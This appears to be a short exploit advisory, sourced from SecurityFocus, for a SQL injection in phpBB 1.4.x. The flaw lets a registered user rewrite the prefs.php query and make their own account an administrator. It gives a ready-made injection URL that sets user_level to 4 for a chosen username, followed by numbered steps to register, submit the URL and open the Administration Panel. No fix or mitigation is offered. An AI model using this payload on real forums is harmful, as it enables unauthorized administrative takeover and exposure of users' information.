22 lines
No EOL
922 B
Text
22 lines
No EOL
922 B
Text
source: https://www.securityfocus.com/bid/3142/info
|
|
|
|
phpBB is free, open-source, easy-to-use web forums software.
|
|
|
|
An issue exists in phpBB which allows a remote attacker to manipulate SQL queries in such a way as to gain an administrative account with the service.
|
|
|
|
This problem is due to improper validation of user-supplied input by certain variables in phpBB. This issue can be exploited by making a cleverly crafted web request that contains arbitrary user-supplied replacement values.
|
|
|
|
One consequence of successful exploitation is that the attacker will be privy to user information.
|
|
|
|
http://sitename/phpBBfolder/prefs.php?save=1
|
|
&viewemail=1',user_level%3D'4'%20where%
|
|
20username%3D'l337h4x0r'%23
|
|
|
|
Summary:
|
|
|
|
1. Register an account on a phpBB board version
|
|
1.4.x .
|
|
2. Enter above URL with the correct sitename
|
|
and replace l337h4x0r with your username.
|
|
3. Click on "Administration Panel" near the bottom of
|
|
the page. |